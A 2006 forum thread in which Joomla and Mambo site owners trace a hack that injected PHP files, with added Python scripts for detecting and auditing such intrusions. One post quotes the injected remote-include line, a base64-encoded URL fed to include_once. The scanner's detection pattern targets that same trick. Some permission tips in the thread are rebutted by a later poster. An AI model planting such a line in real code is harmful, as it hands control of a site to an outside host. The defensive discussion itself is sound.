Site Hacked - 2 files uploaded...

Post by TWDesigns » Mon Jan 09, 2006 5:13 am

Here is what was uploaded to all the sites that were hacked.  I asked before posting this to make sure it was ok and I'm no programmer so someone else can take a looksee.
And
I've changed every pass I have and restored backups to be safe.  So if anything above looks like or decodes to a password no worries  :P
All sites were the latest Joomla! (patched)
One site was a much older version that I used for testing.. it had MOS_ tables so probably one of the firsts. It was off by itself on a separate domain.
No other software was installed on any other than Joomla! and 3rd party components.  None were components mentioned in other threads by users with the same problem.

.... Anything else I can give as far as information let me know!  ???

Post by webguy » Mon Jan 09, 2006 7:43 am

Exactly the same on the sites of my client.
My client was running Mambo 4.5.2.3.

Question is: is this Mambo/Joomla related or is it a server issue?
René Kreijveld
http://www.renekreijveld.nl | Joomla! professional

Post by j00be » Mon Jan 09, 2006 9:03 am

Re TWDesigns Post

Can you give us a list of third party modules, bots and components you had installed? This could help define the issue better.

Thanks!

Post by Christer » Mon Jan 09, 2006 9:17 am

It's not only all versions of joomla and mambo who are having these problems. Also php nuke and other php websites. The strange thing is that my html files are working fine. At my hosting company there are a lot of people who use other php scripts and these have the same symptoms.

1. Blank white page
2. Redirect to a landing page (ppc)

That is why I think it's a server wide hack.

If your page redirects to a landing page look at the whois of the owner. Maybe it's the same one as mine. Some guy from Russia.

Post by webguy » Mon Jan 09, 2006 9:19 am

Christer,

Thanks for your explanation. I have experienced exactly the same thing.
Can you please clarify what you mean by:
Christer wrote: If your page redirects to a landing page look at the whois of the owner. Maybe it's the same one as mine. Some guy from Russia.
?
René Kreijveld
http://www.renekreijveld.nl | Joomla! professional

Post by TWDesigns » Mon Jan 09, 2006 10:05 am

I didn't see any posts over at postnuke or phpbb yet which is why I was worried it was a joomla/mambo issue, maybe I didn't look hard enough. Anyways I just finished restoring all my sites (5am later), time for some shut eye  ;)

Maybe the next few days will shed more light on the problem and what software is causing it.

Post by Christer » Mon Jan 09, 2006 11:03 am

I said that so we could check if it's just one person who is doing this or multiple hackers. I suppose we are all hosted somewhere else but you never know.

Post by guilliam » Wed Jan 11, 2006 12:24 am

maybe you can all post where you are hosted.. so you can see if you guys are all hosted under the same roof.

- g
"I was one of those who wondered why people would pay so much $$$$ to do something that was so much fun!" -R. Harkrider, Fortran Code Engr.

http://www.joomlaconsultancy.net

Post by FuzzieDice » Wed Jan 11, 2006 2:16 am

You mentioned that two files were 'uploaded'. Can you also give the filenames they were uploaded as?

I've had some blank-page issues in phpBB of late too, even after a full upgrade. But I haven't seen any odd files that didn't seem to belong on the server.

Post by coldfrost » Wed Jan 11, 2006 11:56 am

Hi

They have changed many php-files in two of my sites. Would make a very long list, but it is related to components, modules and languages mostly.
Funny thing, I have one of those sites using both Joomla and Lifetype and only Joomla is hit ???

Post by TWDesigns » Wed Jan 11, 2006 1:41 pm

My joomla sites that were locked down didn't get destroyed. The ones with an open dir took the hit.

I do have a question about this. I don't have time to look this back up but I think I remember joomla asking that some of the folders have permission 755 in order to function properly, for installing of coms and mods and the cache dir also. If I set it to that it still tells me it's unwritable.... Anyone know why this is? 777 is the only way I can get the red warnings to turn green.

From a previous reply, the files that are uploaded are normally named..
Date.php
Time.php
Create.pho
Guest.php
there are a couple more but I can't think of them right now. Also the STRANGE thing is, the files appeared in the same dir's on all my sites with the same file name. Like in languages I had date & time on all sites. Almost like it was written to know where to put which file names..

Post by FuzzieDice » Wed Jan 11, 2006 4:24 pm

Another question... do you know if php's 'safe mode' is on, on the hosting server?

Post by TWDesigns » Wed Jan 11, 2006 5:30 pm

Relevant PHP Settings: 
Safe Mode: OFF

Post by FuzzieDice » Wed Jan 11, 2006 9:24 pm

If safe mode was turned on, it might be that they wouldn't have been able to tamper with the files as easily. However, the drawback with safe mode being on is that scripts have a hard time writing files they need to, which can result in things like inability to install some modules, components and mambots, uploading files, images, etc.

Post by wayne » Thu Jan 12, 2006 12:02 pm

I got the exact same thing, I found this code
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")

will link to: http://bis.iframe.ru/master.php.
Anyone know how to prevent this from happening again?
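
A defender's sweep for the pattern quoted in the post above, as an added example that is not part of the original post: it flags PHP lines where a base64_decode() literal decodes to a URL and records whether that result is handed to include/require. The function names and the constructed SAMPLE are assumptions; only the encoded fragment comes from the post.

```python
import base64
import binascii
import re
from pathlib import Path

# base64_decode("...") or base64_decode('...') with a literal string argument.
B64_CALL = re.compile(r"""base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=]{8,})\1""")
# include/require (optionally @-silenced, optionally _once) fed by the decode call.
INCLUDE_B64 = re.compile(
    r"@?\s*(?:include|require)(?:_once)?\s*\(?\s*base64_decode", re.I)
URL_PREFIX = re.compile(r"(?i)(?:https?|ftp)://")

def decode_literal(b64):
    """Decode a base64 literal to text; return None if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def scan_php_source(text):
    """Return [(line_no, decoded_url, is_remote_include)] for one PHP source string."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for match in B64_CALL.finditer(line):
            decoded = decode_literal(match.group(2))
            if decoded and URL_PREFIX.match(decoded):
                findings.append((line_no, decoded, bool(INCLUDE_B64.search(line))))
    return findings

def scan_tree(root):
    """Scan every *.php file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        if path.is_file():
            found = scan_php_source(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample: one harmless decode plus the fragment quoted in the post above.
SAMPLE = """<?php
$lang = base64_decode('ZW5nbGlzaA==');
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")
"""

if __name__ == "__main__":
    for line_no, url, is_include in scan_php_source(SAMPLE):
        print(f"line {line_no}: literal decodes to {url} (remote include: {is_include})")
```

The scan only sees literal string arguments on a single line; an encoded value built from variables or split across lines will not match.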

Post by keh » Thu Jan 12, 2006 12:37 pm

wayne wrote: Anyone know how to prevent this from happening again?
For starters: When you're finished installing and working with your site, leave as few folders as possible (and files if u have - index.php in your template - for example) world writable (chmod'ed to 777). If you leave your template index.php world writable it's like an invitation to deface your site. Never install components, modules and templates with the new folders and files permissions set to world writable in the global settings under the server tab. Use Joomla explorer component to control and overwrite files... I guess if you go through the folders that had the extra files in them for the defacement/redirect and the files that got changed, the file permissions were set to world writable...

Post by jeffmather » Sat Jan 14, 2006 3:33 am

I found this site earlier today when I discovered this issue manifesting itself on my server.  At first, I thought it was related to Movable Type, but it appears to be any PHP-enabled host with 777 permissions on directories.  It's also not new, as I discovered my site had been doing this since June.

It's a fairly straightforward problem to clean up (see here) but it might indicate further vulnerabilities on your system. My problems started after my site picked up a worm from a public computer when I was on vacation in India. IE users will probably have told you they experienced miscellaneous badness, but it's still a good idea to look for files with the same timestamp as the malicious php and .htaccess files.

This all seems related to certain Google hijacking exploits: http://clsc.net/research/google-302-page-hijack.htm.

Good luck.

Post by TWDesigns » Sun Jan 15, 2006 5:33 pm

Thanks for that information Jeff. I hope they find a fix for this because some DIR's require write access like cache and etc. I saw an OScommerce installation last night that took a big hit also. The default installation had TONS of writable directories...

Back to the drawing board.

Post by Tonie » Sun Jan 15, 2006 5:36 pm

A small tip for the cache directory. I have deleted the cache directory and index.html from my install. I created the directory again with JoomlaXplorer (if you have shell access that is even easier). This will give your Apache user ownership of that directory. Copy the index.html file to it, and change the rights to 755. This will make sure that all Joomla components can read/write in this directory, without the 777 rights needed for your cache directory.

Post by TWDesigns » Sun Jan 15, 2006 5:54 pm

Nice tip. Thanks!  :D

Post by TWDesigns » Wed Jan 18, 2006 8:53 pm

I just got hit again with everything locked down... so I thought.  I had installed SMF Bridge and it wrote the dir's as owned by nobody which they gained access from.

Has anyone come up with a solution for the "nobody" problem yet?
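
One way to audit a site for the two conditions raised in this thread, world-writable paths (keh's advice) and directories owned by the web server account such as 'nobody' (the post above), as an added example that is not from any poster. The function names, the allow_owned parameter and the sample tree are assumptions made for illustration.

```python
import os
import stat
import tempfile

def audit_webroot(root, web_uid, allow_owned=()):
    """Return sorted (relative_path, problem) tuples for everything under root.

    web_uid is the numeric uid the web server runs as (assumption: the caller
    supplies it, for example the uid of 'nobody'). allow_owned lists relative
    directories, such as 'cache', that the web server is meant to own; they
    are still reported if they are world-writable.
    """
    allowed = {os.path.normpath(p) for p in allow_owned}
    problems = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            st = os.lstat(full)  # lstat: judge the entry itself, not a link target
            if stat.S_ISLNK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:
                problems.append((rel, f"world-writable ({mode:03o})"))
            in_allowed = any(rel == a or rel.startswith(a + os.sep) for a in allowed)
            if st.st_uid == web_uid and not in_allowed:
                problems.append((rel, "owned by web server user"))
    return sorted(problems)

def build_sample_tree(root):
    """Constructed sample layout: one locked-down file, one wide-open directory."""
    layout = {"index.php": 0o644, "language/date.php": 0o666}
    os.mkdir(os.path.join(root, "cache"))
    os.mkdir(os.path.join(root, "language"))
    for rel, mode in layout.items():
        path = os.path.join(root, *rel.split("/"))
        with open(path, "w") as fh:
            fh.write("<?php\n")
        os.chmod(path, mode)
    os.chmod(os.path.join(root, "cache"), 0o755)
    os.chmod(os.path.join(root, "language"), 0o777)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        # Constructed run: pretend the current user is the web server account.
        for rel, problem in audit_webroot(tmp, os.getuid(), allow_owned=["cache"]):
            print(f"{rel}: {problem}")
```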

Post by PaulEarley » Sat Jan 21, 2006 7:01 pm

Tonie wrote: I created the directory again with JoomlaXplorer
I might be dense, but I cannot figure out how to add a NEW directory with JoomlaXplorer. Can you tell me how to do this?
Paul Earley

Post by TWDesigns » Sat Jan 21, 2006 8:35 pm

haha, don't feel bad. I was about to ask the same thing. Maybe there is a newer version than what we have.

Post by Tonie » Sat Jan 21, 2006 10:37 pm

This took me about 15 minutes to find out just now, done this months ago.

Ok, make sure that the rights on the public_html (the start of your webspace) has 777 rights instead of 755. When opening JoomlaXplorer now, there is a link on the right to create a file or directory. Create the directory, this is done with the Apache user rights. Change the rights of public_html back again, and it should have the configuration you want.

You can only create files or directories with JoomlaXplorer in directories where you have rights to do so.

Sorry for the confusion, I sure was for a moment :).

Post by TWDesigns » Sat Jan 21, 2006 10:45 pm

LOL Thanks for clearing that up  ;D

Post by PaulEarley » Sat Jan 21, 2006 10:45 pm

Thanks for that great tip. I never would have figured that out!
Paul Earley

Post by pmarfell » Sun Jan 22, 2006 6:14 pm

I would like to know how people find that they have been "got at"?

There are thousands of files on the server. The action of the virus/bot or whatever might only be seen by visitors who will probably just go away and never return.

I am not sure which sections need which access rights. A script would be great but would need root access or to do it through FTP I guess.

Does the tampering always show in modified dates? If it does then the process I have tried will catch things reasonably quickly. I connect via FTP and "dir -R c:\dirlist.txt". Some time later I do the same again but with a different file name and then put the files on a Linux box and "diff file1 file2" to see any differences.

What I would like to do is get the listing into a database. Do the comparison, Send an email if there are differences. Accept the differences. Run it again the next day. All by Cron.

Post by PicsOne » Sat Mar 25, 2006 6:37 am

Please, NEVER leave your files at 777. This is the first hole.
I modified a great script to recursively change files and directories to different permissions (e.g. files 644, dirs 775).
Here it is:
http://contribs.org/modules/pbboard/vie ... hp?t=30543

Also run this beautiful utility:
http://miraculixx.freewebspace.com/

Pay attention to your .htaccess files, the worm also infects this file.
Also read:
http://lists.indymedia.org/pipermail/im ... 05-eq.html

Thank you and sorry for my language
Normando

Post by atela » Wed Jun 21, 2006 4:11 pm

:'(

Just discovered today that all my joomla & mambo sites have been "hacked" this way... Also some other scripts (4images for example)

I will note all the recommendations about directories, but I know I'm lazy with these kind of things...
http://www.atela.net
Joomla and Opensource for Spain

Post by RobS » Thu Jun 22, 2006 2:43 am

I am noticing more and more bad information when it comes to security and Joomla.  A lot of which seems to come from inexperience, the rest appears to be due to confusion.  Firstly, to address a comment made by Tonie:
Tonie wrote: A small tip for the cache directory. I have deleted the cache directory and index.html from my install. I created the directory again with JoomlaXplorer (if you have shell access that is even easier). This will give your Apache user ownership of that directory. Copy the index.html file to it, and change the rights to 755. This will make sure that all Joomla components can read/write in this directory, without the 777 rights needed for your cache directory.
You are not achieving any security advantage with this procedure, all you are doing is basically changing the ownership of the directory from your login to the Apache process, most likely the 'nobody' user. If the attack is coming from an issue with Joomla or PHPBB or any other script on your website (which almost all of the attacks launched against Joomla seem to come from), it is running as 'nobody' and therefore has the same permissions as Apache. The only thing that this would prevent is from another user on the web server from writing to this directory which in my opinion is a moot point. You are achieving no practical security benefit from this configuration.

Additionally, this always seems to need clarification.  For the most secure out of the box configuration, files and directories should be owned by a user that is NOT the same as the apache process user (usually the 'nobody' user).  Files should have permissions 644 and directories should have permissions 755.

Security is like an onion, it works best with many layers of protection.  And as I often regret having to say, it is very difficult to achieve a good level of security in a shared hosting environment.  The tools just are not there. 

@pmarfell
pmarfell wrote: Does the tampering always show in modified dates? If it does then the process I have tried will catch things reasonably quickly. I connect via FTP and "dir -R c:\dirlist.txt". Some time later I do the same again but with a different file name and then put the files on a Linux box and "diff file1 file2" to see any differences.

What I would like to do is get the listing into a database. Do the comparison, Send an email if there are differences. Accept the differences. Run it again the next day. All by Cron.
A good attacker can modify a file without changing the modified timestamps. However, given the nature of probably all Joomla attacks, this is not something to worry about. Based on the comments of what you would like to do with this approach of comparing timestamps, you should look at an application called Tripwire. There is an enterprise edition (read expensive) and an opensource free version available at http://sourceforge.net/projects/tripwire/ You can configure it to monitor many aspects of file or directory stats such as ownership, permissions, timestamp, checksum, etc. It is very comprehensive and would make a great tool for monitoring Joomla directory structures. You can also tell it to ignore the modification of certain stats, which is very useful for something like a log file where it will monitor to make sure the permissions and ownership haven't changed but it will ignore changes in the size of the file. These principles can probably be applied very successfully to monitoring Joomla directory structures if you have the access to the server to install and configure it, which going back to the problem with shared hosting, many people unfortunately do not. However, you indicated having access to cron, so perhaps you have this type of access.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
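
The listing-and-compare routine pmarfell asks about, using the checksum, permission and ownership attributes RobS describes, as an added example (this is not Tripwire and not code from any poster). It keeps a SHA-256 baseline in a JSON file, so a content change is reported even when the modified timestamp is unchanged; the function names and the baseline format are assumptions.

```python
import hashlib
import json
import os
import stat
import sys

FIELDS = ("sha256", "mode", "uid")

def snapshot(root):
    """Return {relative_path: {sha256, mode, uid}} for every regular file under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets and other non-regular entries
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            snap[os.path.relpath(full, root)] = {
                "sha256": digest, "mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid}
    return snap

def compare(baseline, current, ignore_content=()):
    """Diff two snapshots. Paths in ignore_content (log files, say) are still
    checked for mode and owner, but a changed checksum is not reported."""
    report = {"added": sorted(set(current) - set(baseline)),
              "removed": sorted(set(baseline) - set(current)),
              "changed": {}}
    for path in sorted(set(baseline) & set(current)):
        diff = [f for f in FIELDS if baseline[path][f] != current[path][f]
                and not (f == "sha256" and path in ignore_content)]
        if diff:
            report["changed"][path] = diff
    return report

def accept(snap, baseline_file):
    """Store snap as the new baseline once the reported differences are reviewed."""
    with open(baseline_file, "w") as fh:
        json.dump(snap, fh, indent=1, sort_keys=True)

def check(root, baseline_file, ignore_content=()):
    """First run records the baseline and returns None; later runs return the report."""
    current = snapshot(root)
    if not os.path.exists(baseline_file):
        accept(current, baseline_file)
        return None
    with open(baseline_file) as fh:
        return compare(json.load(fh), current, ignore_content)

if __name__ == "__main__":
    # Usage (paths are placeholders): script.py WEBROOT BASELINE_FILE
    # Keep BASELINE_FILE outside WEBROOT so a compromised site cannot rewrite it.
    result = check(sys.argv[1], sys.argv[2])
    if result and any(result.values()):
        print(json.dumps(result, indent=1))  # cron mails job output when mail is set up
        sys.exit(1)
```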

